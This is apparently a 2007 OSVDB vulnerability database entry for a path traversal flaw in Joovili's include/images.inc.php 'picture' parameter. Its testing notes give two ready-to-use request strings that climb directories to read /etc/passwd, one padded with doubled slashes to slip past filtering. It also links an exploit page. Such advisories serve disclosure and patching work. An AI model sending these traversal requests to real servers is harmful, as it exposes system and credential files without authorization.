Joovili include/images.inc.php picture Variable Traversal Arbitrary File Access

2007-12-27T00:00:00
ID OSVDB:40153
Type osvdb
Reporter OSVDB
Modified 2007-12-27T00:00:00

Description

Manual Testing Notes

include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

References:

Secunia Advisory ID: 28231
Generic Exploit URL: http://www.milw0rm.com/exploits/4799
CVE-2007-6620
Bugtraq ID: 27056